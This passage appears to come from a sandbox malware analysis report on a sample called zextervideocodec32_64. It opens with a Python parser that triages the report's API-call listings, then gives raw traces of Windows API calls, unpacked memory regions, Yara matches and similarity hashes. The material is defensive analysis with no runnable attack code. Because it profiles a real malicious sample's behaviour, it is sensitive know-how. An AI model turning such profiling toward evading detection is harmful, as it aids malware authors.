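The listing is machine-generated, but its shape is regular enough to triage with a script: every entry opens with an APIs header, lists each call with the module it resolved to and its ref: address, then names the memory-dump region and whether that region is backed by the PE image on disk. Two things a practitioner wants out of it are which calls live in regions not backed by the PE (the unpacked or injected code, which in this report is also where the Yara rule fired, at 02BC1000) and the concrete arguments the sandbox captured, such as the third parameter of SetWaitableTimer in the entry above, which is lPeriod in milliseconds. The Python parser below is an added example, not Joe Sandbox code and not anything from the sample; it runs on a constructed excerpt copied in the shape of the entries above and assumes the sandbox prints call arguments in parameter order, so that args[2] of SetWaitableTimer is lPeriod.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed excerpt in the shape of the listing above (two entries); sample
# input for the parser, not the full report.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 02BCE52C
  • Part of subcall function 02BC26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
  • Part of subcall function 02BC26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
  • Part of subcall function 02BC26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Yara matches
APIs
• RegCloseKey.KERNELBASE(?), ref: 0040D5CA
Memory Dump Source
• Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
"""

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_@0-9]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str]  # subcall function address, None when called directly

@dataclass
class Entry:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    pe_backed: bool = False
    yara: bool = False

def parse_entries(text: str) -> List[Entry]:
    """Split the listing at each 'APIs' header; collect calls, region and Yara flag."""
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            cur.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                     m.group("ref"), m.group("caller")))
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.source_file, cur.offset = m.group("file"), m.group("offset")
            cur.pe_backed = m.group("pe") == "true"
        elif stripped == "Yara matches":
            cur.yara = True
    return entries

def summarize_by_region(entries: List[Entry]) -> Dict[str, dict]:
    """Group entries by dump region and union their API surface (MODULE!Name)."""
    regions: Dict[str, dict] = {}
    for e in entries:
        r = regions.setdefault(e.offset, {"pe_backed": e.pe_backed, "yara": False,
                                          "entries": 0, "apis": set()})
        r["entries"] += 1
        r["yara"] = r["yara"] or e.yara
        r["apis"].update(f"{c.module}!{c.name}" for c in e.calls)
    return regions

def unbacked_regions(regions: Dict[str, dict]) -> List[str]:
    """Regions with no PE image behind them: unpacked or injected code, worth dumping."""
    return sorted(off for off, r in regions.items() if not r["pe_backed"])

def waitable_timer_periods_ms(entries: List[Entry]) -> List[int]:
    """lPeriod (ms) of each SetWaitableTimer(hTimer, pDueTime, lPeriod, ...) call.
    Assumes arguments are printed in parameter order; '?' means unresolved."""
    out = []
    for e in entries:
        for c in e.calls:
            if c.name == "SetWaitableTimer" and len(c.args) > 2 and c.args[2] != "?":
                out.append(int(c.args[2], 16))
    return out
```

On the excerpt this reports 02BC1000 as the only region not backed by a PE image, with the Yara hit and the timer APIs on it, and decodes the captured lPeriod 000493E0 to 300000 ms, a five-minute period, which is the kind of interval worth matching against the beaconing seen in the network section. Pointing it at a full exported listing gives the per-region API surface without reading thousands of entries by hand.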
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE30B
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BCE527: __EH_prolog.LIBCMT ref: 02BCE52C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4254904621-0
                                                                                                      • Opcode ID: 8ac96a6933e4905676d7868d2740058d6974515f833d87b9944fd14abd831c1c
                                                                                                      • Instruction ID: d923ea9cdeea6015a87f4b3f06a75a67ad6026987141cebf8248c2eec7e1a929
                                                                                                      • Opcode Fuzzy Hash: 8ac96a6933e4905676d7868d2740058d6974515f833d87b9944fd14abd831c1c
                                                                                                      • Instruction Fuzzy Hash: B3E0CD71A00105DFCF0DDFA8D800B7D77A6DB44300F1085EDB409D6640EB70D9008F04
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD5C3A: __getptd_noexit.LIBCMT ref: 02BD5C3B
                                                                                                        • Part of subcall function 02BD5C3A: __amsg_exit.LIBCMT ref: 02BD5C48
                                                                                                        • Part of subcall function 02BD3473: __getptd_noexit.LIBCMT ref: 02BD3477
                                                                                                        • Part of subcall function 02BD3473: __freeptd.LIBCMT ref: 02BD3491
                                                                                                        • Part of subcall function 02BD3473: RtlExitUserThread.NTDLL(?,00000000,?,02BD3453,00000000), ref: 02BD349A
                                                                                                      • __XcptFilter.LIBCMT ref: 02BD345F
                                                                                                        • Part of subcall function 02BD8D74: __getptd_noexit.LIBCMT ref: 02BD8D78
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405322794-0
                                                                                                      • Opcode ID: e3bd217db93d837dd49e5b4e578de8ec78d5666bf67bc70452037a3e6742a2d9
                                                                                                      • Instruction ID: 374adbb031a1cd6e49e30cb49302336eb1fdd622373d1b0627caf436ec8a38ad
                                                                                                      • Opcode Fuzzy Hash: e3bd217db93d837dd49e5b4e578de8ec78d5666bf67bc70452037a3e6742a2d9
                                                                                                      • Instruction Fuzzy Hash: BBE0ECF59046049FEB08BBA4D805FAD77B6AF44311F2405C8E102AB2B1EA75AD419F61
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      • Opcode ID: c990979c1844e3b86e7c6809e5fb8eb5e46c0e9cbd060de99f8df69504127ef8
                                                                                                      • Instruction ID: 32c96c72d1fdc658770ac6147e863496cde44dd24ac3f560ed056d496bb7c34d
                                                                                                      • Opcode Fuzzy Hash: c990979c1844e3b86e7c6809e5fb8eb5e46c0e9cbd060de99f8df69504127ef8
                                                                                                      • Instruction Fuzzy Hash: A1C08CA494C216F9D00025A00F8CF33215C8700788B20817B3903B10C1C4BC948BF03F
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNELBASE ref: 0040220C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 4241100979-0
                                                                                                      • Opcode ID: 4bd4fa03f0a192a976a056be9e61e5c0d78db41fa319a90d6d207b85695bff87
                                                                                                      • Instruction ID: eeb2a21f5a177b313222c4024f32d818217300d85d52e7011245ffeeed06a56a
                                                                                                      • Opcode Fuzzy Hash: 4bd4fa03f0a192a976a056be9e61e5c0d78db41fa319a90d6d207b85695bff87
                                                                                                      • Instruction Fuzzy Hash: B0B0927408A924E2C60223B00F1DDAF202C2E0A781331807BB682700D14AFC1A0B22BF
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: ac16492dc500231346d158f7620a563ccfadfa18a928bd35894e83afd742e737
                                                                                                      • Instruction ID: a130fa5e48b560970f07615ca9469a598ec7d6b9975e09baeb9bbecdfdaf3fbf
                                                                                                      • Opcode Fuzzy Hash: ac16492dc500231346d158f7620a563ccfadfa18a928bd35894e83afd742e737
                                                                                                      • Instruction Fuzzy Hash: 93C00230A18116DBD7448AF18B482AA66A46B40348F6149BB9417B25C0E7BD968E6A1F
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: a7b0b7e89708bd837af10ae4be236a98302593f610d11f17fd14d8da2e32efd4
                                                                                                      • Instruction ID: 942287d6cc7425515ac5a4c5928e916850624a1805b0f3c2f8add6f4f2a1b579
                                                                                                      • Opcode Fuzzy Hash: a7b0b7e89708bd837af10ae4be236a98302593f610d11f17fd14d8da2e32efd4
                                                                                                      • Instruction Fuzzy Hash: 6E9002302044129AC6900E105B9C018255351403163610439D786E40E4CA744489A51E
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bfa000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 802bcb9ad2d49aab931c12b5ae84b42f1df8a899bc4930c8730d95c2137fd4cb
                                                                                                      • Instruction ID: 5f9093244a21a3bb84b0d25fda0924e36b8f2e2c5f05901384be588e437b5845
                                                                                                      • Opcode Fuzzy Hash: 802bcb9ad2d49aab931c12b5ae84b42f1df8a899bc4930c8730d95c2137fd4cb
                                                                                                      • Instruction Fuzzy Hash: 69316FB290D610AFE3056E59DC81BBAB7E8EF58760F06492EE6C5D3200E6355841C6D7
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: 7b6db3901bd67a4416983e2a8edd626fbd5c53e8406e17de7cd64e884ba0ab48
                                                                                                      • Instruction ID: 19d457f24e78600376c53a8485c156f40cee28a1337523e6f748313ffbe2c5e4
                                                                                                      • Opcode Fuzzy Hash: 7b6db3901bd67a4416983e2a8edd626fbd5c53e8406e17de7cd64e884ba0ab48
                                                                                                      • Instruction Fuzzy Hash: E9214935808242DBD704CFB4EE917A17BB0B705750F28827BC596B31E2C378890ADB1E
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD15F0: OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
                                                                                                        • Part of subcall function 02BD15F0: CloseHandle.KERNEL32(00000000), ref: 02BD16A5
                                                                                                        • Part of subcall function 02BD15F0: ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
                                                                                                        • Part of subcall function 02BD15F0: CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
                                                                                                      • TlsSetValue.KERNEL32(0000002B,?), ref: 02BD218A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1556185888-0
                                                                                                      • Opcode ID: 55c1b21f3d0ec2e3b11886d6ef6b5d03a3a31b87f504b54a35ed4518de6a7111
                                                                                                      • Instruction ID: 8926362e645b58adba1491f76ea6ff3bf13597b494a920b6a1ff8972238c63f8
                                                                                                      • Opcode Fuzzy Hash: 55c1b21f3d0ec2e3b11886d6ef6b5d03a3a31b87f504b54a35ed4518de6a7111
                                                                                                      • Instruction Fuzzy Hash: 01018471E40244ABD710CFACD845B9ABBA8EB05660F104796F925D3690E77569008A94
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040D62B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 1dd41e6686bd822ea595729d237ab53c9cdcc9704c691854a431aa7eaaa3c26a
                                                                                                      • Instruction ID: 0b6dd63b63fbbc38307b0e82f0bb62100026e0ae42352c4b099ee0d801dcd9a1
                                                                                                      • Opcode Fuzzy Hash: 1dd41e6686bd822ea595729d237ab53c9cdcc9704c691854a431aa7eaaa3c26a
                                                                                                      • Instruction Fuzzy Hash: 33E0D861C0C7C0AFC3022A604A58A79BB18BF29304F2519B7E442761D1E43E0807A77F
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 004026C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: eedf54f1546ecde272d8f04992911208c152afd1baa7028af89c0e707a28f26e
                                                                                                      • Instruction ID: 74f137ddbcde1c77c26fe787cba9ddbea217936d1492596de739919d1302819c
                                                                                                      • Opcode Fuzzy Hash: eedf54f1546ecde272d8f04992911208c152afd1baa7028af89c0e707a28f26e
                                                                                                      • Instruction Fuzzy Hash: D5E0C271C14304AFC7019B248D8469EB7F4AF05320F018A6AF175B32C0C77C6929DBDA
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 004026C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 439dd529b9abb2b2adc7dce84e893a85a3a44bed3194729940265dbcb0abde27
                                                                                                      • Instruction ID: d24ba4203171b81c8d1ff0907d4106163ffdccce9a791f9bef02934f7126e645
                                                                                                      • Opcode Fuzzy Hash: 439dd529b9abb2b2adc7dce84e893a85a3a44bed3194729940265dbcb0abde27
                                                                                                      • Instruction Fuzzy Hash: D5D0C2318002049FD300AB408A45BAAB3B0BB04300F10803AE051721C0C3B858299BDA
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040D62B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: df2313319e77dccb116f50e8ab8f6206455693badbc0acb58ba5efbf54a0ed84
                                                                                                      • Instruction ID: eea654838261cd072344f1549b98415cc54984fc4591f7fcd9b81e2a24225462
                                                                                                      • Opcode Fuzzy Hash: df2313319e77dccb116f50e8ab8f6206455693badbc0acb58ba5efbf54a0ed84
                                                                                                      • Instruction Fuzzy Hash: 10A00131E88A0096E6402AE46F1AB3A2620BB05B01F26192B624A784D449BE144A6B9B
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BC9AAF: __EH_prolog.LIBCMT ref: 02BC9AB4
                                                                                                        • Part of subcall function 02BC9AAF: _Allocate.LIBCPMT ref: 02BC9B0B
                                                                                                        • Part of subcall function 02BC9AAF: _memmove.LIBCMT ref: 02BC9B62
                                                                                                      • _memset.LIBCMT ref: 02BD0919
                                                                                                      • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02BD0982
                                                                                                      • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02BD098A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                      • String ID: Unknown error$invalid string position
                                                                                                      • API String ID: 1854462395-1837348584
                                                                                                      • Opcode ID: 6ab8079cbb010f0a23f0d9eaf7f9b43ac0845497993dd0941a1cc850ccecbd30
                                                                                                      • Instruction ID: abcc03ea96aaa04dd3c1746255707ff2e3875cbe912e75a869915d56fce75ada
                                                                                                      • Opcode Fuzzy Hash: 6ab8079cbb010f0a23f0d9eaf7f9b43ac0845497993dd0941a1cc850ccecbd30
                                                                                                      • Instruction Fuzzy Hash: 9551AD702083419FEB14DF24C890B6EBBE4EB98344F500DAEF49297691E771E588CF52
                                                                                                      APIs
                                                                                                      • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D15A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CtrlDispatcherServiceStart
                                                                                                      • String ID: test
                                                                                                      • API String ID: 3789849863-3632233996
                                                                                                      • Opcode ID: 62d4dfb808210626677f020231cc8997fd32626447a6781c4c939b5edb5d32bc
                                                                                                      • Instruction ID: 73591cfe463514ed459f964e2c340f9966edd9af912481339b9f9d215462bc13
                                                                                                      • Opcode Fuzzy Hash: 62d4dfb808210626677f020231cc8997fd32626447a6781c4c939b5edb5d32bc
                                                                                                      • Instruction Fuzzy Hash: EEE01274D08344E9EB10DFA08A489796774AB45300B308077D50AB62D5C77D4E4F7A0F
                                                                                                      APIs
                                                                                                      • CreateServiceA.ADVAPI32 ref: 0040D3E8
                                                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 0040D3F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$CloseCreateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1873643653-0
                                                                                                      • Opcode ID: dbbf10d3d4f90bdd11982929392454f3b4702c9dbdfe5cd029521d635c4322fa
                                                                                                      • Instruction ID: 569c7dc1a6a3224979b4ee1e760b0c65d326e05aa0229ed68e38a6959c0f0250
                                                                                                      • Opcode Fuzzy Hash: dbbf10d3d4f90bdd11982929392454f3b4702c9dbdfe5cd029521d635c4322fa
                                                                                                      • Instruction Fuzzy Hash: D8C08C30808000EBCF209FA09F0C4183630A38032032280B9E082B20A0CB389D0EBB2C
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02BD4E76,?,?,?,00000001), ref: 02BD950D
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02BD9516
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 36c3bcd37fd3184ef47a58af34021f2cdc8f3d42dada6ae236118e3b4c72b06d
                                                                                                      • Instruction ID: 7e9564ce4a53050a7bc2fee71108ae38c28975db6190be14925ab15fb01497bc
                                                                                                      • Opcode Fuzzy Hash: 36c3bcd37fd3184ef47a58af34021f2cdc8f3d42dada6ae236118e3b4c72b06d
                                                                                                      • Instruction Fuzzy Hash: AAB09231484208EBCF412B91FC09B89BF28EB046A2F004C10F60E4A0528F625520ABA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2102423945-0
                                                                                                      • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                      • Instruction ID: b3eab8a2a3904000f9740385c404d5fd025e2537b5f21da15ed7101f31646e32
                                                                                                      • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                      • Instruction Fuzzy Hash: C5F082B1904309AAD700DF99D942B9DFBB9EB44314F20817AD50CA7340F6707A118B94
APIs
• RtlDecodePointer.NTDLL(?), ref: 02BD831A
• _free.LIBCMT ref: 02BD8333
  • Part of subcall function 02BD2F54: HeapFree.KERNEL32(00000000,00000000,?,02BD5CB2,00000000,00000104,75920A60), ref: 02BD2F68
  • Part of subcall function 02BD2F54: GetLastError.KERNEL32(00000000,?,02BD5CB2,00000000,00000104,75920A60), ref: 02BD2F7A
• _free.LIBCMT ref: 02BD8346
• _free.LIBCMT ref: 02BD8364
• _free.LIBCMT ref: 02BD8376
• _free.LIBCMT ref: 02BD8387
• _free.LIBCMT ref: 02BD8392
• _free.LIBCMT ref: 02BD83B6
• RtlEncodePointer.NTDLL(007E5930), ref: 02BD83BD
• _free.LIBCMT ref: 02BD83D2
• _free.LIBCMT ref: 02BD83E8
• _free.LIBCMT ref: 02BD8410
Strings
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
• String ID: 0Y~
• API String ID: 3064303923-133072548
• Opcode ID: 6377e0ba6522d90a3848ee106bdd1dfde21c163521eb7a4b56f4c70862f1e998
• Instruction ID: 7a935d40a15f4c5d1dfe5af6cf71428e190319518821afb9d8b7808b89e3473b
• Opcode Fuzzy Hash: 6377e0ba6522d90a3848ee106bdd1dfde21c163521eb7a4b56f4c70862f1e998
• Instruction Fuzzy Hash: 0B21A632D41251DBDBA59F28F8805857B69F7043B53184CAAEE1C97240FB35986ECF90
APIs
• __EH_prolog.LIBCMT ref: 02BC24E6
• InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02BC24FC
• RtlEnterCriticalSection.NTDLL(?), ref: 02BC250E
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BC256D
• SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02BC257F
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02BC2599
• GetLastError.KERNEL32(?,7591DFB0), ref: 02BC25A2
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC25F0
• InterlockedDecrement.KERNEL32(00000002), ref: 02BC262F
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 02BC268E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC2699
• InterlockedExchange.KERNEL32(00000000,00000001), ref: 02BC26AD
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02BC26BD
• GetLastError.KERNEL32(?,7591DFB0), ref: 02BC26C7
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
• String ID:
• API String ID: 1213838671-0
• Opcode ID: eb0e709e7cfa5b0e5d750c303548cbf5d74861e96ee2b517ce45a233b60145eb
• Instruction ID: e8b3cf8c6d19b4d3e609be6fa1ce85802069e726646e7eb97b025e2475c2ea64
• Opcode Fuzzy Hash: eb0e709e7cfa5b0e5d750c303548cbf5d74861e96ee2b517ce45a233b60145eb
• Instruction Fuzzy Hash: 65613E71900209EFCB10DFA4D584AAEFBB9FF48354F20496EE916E7241EB349954DF60
APIs
